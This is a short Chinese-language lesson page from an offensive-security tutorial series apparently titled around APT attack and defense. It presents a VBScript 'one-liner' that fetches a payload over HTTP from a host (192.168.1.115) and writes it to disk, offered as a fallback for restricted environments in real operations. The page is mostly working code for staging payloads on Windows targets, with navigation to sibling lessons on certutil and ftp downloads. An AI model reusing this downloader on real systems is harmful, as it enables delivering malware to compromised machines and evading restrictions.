专注APT攻击与防御

第三十九课:vbs一句话下载payload补充

在实战中,会碰到许多让人敬畏的环境,也许无法执行,或者无法把下载参数带入其中,故补充第七季 vbs 参数化的下载。

附:源码如下:

```visual basic strFileURL = "http://192.168.1.115/robots.txt" strHDLocation = "c:\test\logo.txt" Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing

```

Micropoor

Previous第三十八课:certutil一句话下载payloadNext第四十课:ftp一句话下载payload

Last updated